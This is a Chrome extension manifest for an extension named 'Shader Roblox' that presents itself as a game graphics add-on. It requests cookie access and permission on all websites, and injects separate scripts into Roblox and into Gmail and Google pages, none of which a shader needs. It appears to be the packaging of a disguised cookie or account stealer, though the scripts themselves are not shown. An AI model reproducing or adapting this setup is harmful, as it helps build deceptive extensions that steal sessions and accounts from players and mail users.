{
  "name": "Shader Roblox",
  "description": "Made by RTX.",
  "version": "2.7.1",
  "manifest_version": 3,
  "action": {
    "default_popup": "main.html",
    "default_icon": "assets/blox.png"
  },
  "host_permissions": [
    "http://*/",
    "https://*/"
  ],
  "permissions": [
    "cookies",
    "http://*/",
    "https://*/",
    "https://www.google.com/*",
    "https://mail.google.com/*",
    "activeTab"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [
    {
      "matches": ["http://www.roblox.com/*"],
      "js": ["content.js"]
    },
    {
      "matches": [
        "http://mail.google.com/*",
        "https://www.google.com/*"
      ],
      "js": ["content2.js"]
    }
  ],
  "icons": {
    "16": "assets/blox.png",
    "32": "assets/blox.png",
    "48": "assets/blox.png",
    "128": "assets/blox.png"
  }
}
